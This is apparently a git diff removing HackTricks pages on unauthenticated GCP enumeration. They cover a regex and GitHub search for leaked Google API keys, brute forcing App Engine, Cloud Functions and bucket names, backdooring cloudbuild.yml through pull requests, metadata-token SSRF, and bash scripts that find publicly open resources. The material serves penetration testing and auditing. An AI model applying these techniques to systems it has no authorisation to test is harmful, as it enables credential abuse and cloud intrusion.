-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### OSINT techniques - -**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github. - -The regex is: **`AIza[0-9A-Za-z_-]{35}`** - -Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F\&type=code\&ref=advsearch) - -### Check origin GCP project - `apikeys.keys.lookup` - -This is extremely useful to check to **which GCP project an API key that you have found belongs to**: - -```bash -# If you have permissions -gcloud services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global - -# If you don't, you can still see the project ID in the error msg -gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE -ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project. -Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN -- '@type': type.googleapis.com/google.rpc.PreconditionFailure - violations: - - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509 - type: googleapis.com -- '@type': type.googleapis.com/google.rpc.ErrorInfo - domain: apikeys.googleapis.com - metadata: - permission: serviceusage.apiKeys.getProjectForKey - resource: projects/89123452509 - service: cloudresourcemanager.googleapis.com - reason: AUTH_PERMISSION_DENIED -``` - -### Brute Force API endspoints - -As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md deleted file mode 100644 index b6340a72b..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - App Engine Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Brute Force Subdomains - -As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**. - -As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**. - -You could use tools like the ones indicated in: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md deleted file mode 100644 index 2e3594d5a..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Artifact Registry Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -Check the following page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md deleted file mode 100644 index 57d506c09..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - Cloud Build Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### cloudbuild.yml - -If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.** - -{% hint style="info" %} -Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems. -{% endhint %} - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -{% hint style="danger" %} -Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**). -{% endhint %} - -Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github: - -
- -{% hint style="warning" %} -Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md deleted file mode 100644 index ba70bc1d7..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md +++ /dev/null @@ -1,103 +0,0 @@ -# GCP - Cloud Functions Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -More information about Cloud Functions can be found in: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Brute Force URls - -**Brute Force the URL format**: - -* `https://-.cloudfunctions.net/` - -It's easier if you know project names. - -Check this page for some tools to perform this brute force: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -### Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $func" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md deleted file mode 100644 index fbb978d13..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# GCP - Cloud Run Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Enumerate Open Cloud Run - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md deleted file mode 100644 index 1fa4e18a2..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Cloud SQL Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud SQL - -For more infromation about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Brute Force - -If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials. - -Check this page for **different tools to burte-force** different database technologies: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force" %} - -Remember that with some privileges it's possible to **list all the database users** via GCP API. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md deleted file mode 100644 index 200dd2333..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Compute Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more information about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### SSRF - Server Side Request Forgery - -If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" %} - -### Vulnerable exposed services - -If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md deleted file mode 100644 index 143207a71..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md +++ /dev/null @@ -1,46 +0,0 @@ -# GCP - Source Repositories Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### Compromise External Repository - -If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and: - -* If someone uses Cloud Shell to develop the repository it could be compromised -* if this source repository is used by other GCP services, they could get compromised - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md deleted file mode 100644 index 39f682aa7..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# GCP - Storage Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Storage check: - -{% content-ref url="../../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Public Bucket Brute Force - -The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.** - -The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -**Also the tools** mentioned in: - -{% content-ref url="../" %} -[..](../) -{% endcontent-ref %} - -If you find that you can **access a bucket** you might be able to **escalate even further**, check: - -{% content-ref url="gcp-public-buckets-privilege-escalation.md" %} -[gcp-public-buckets-privilege-escalation.md](gcp-public-buckets-privilege-escalation.md) -{% endcontent-ref %} - -### Search Open Buckets in Current Account - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $bucket" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
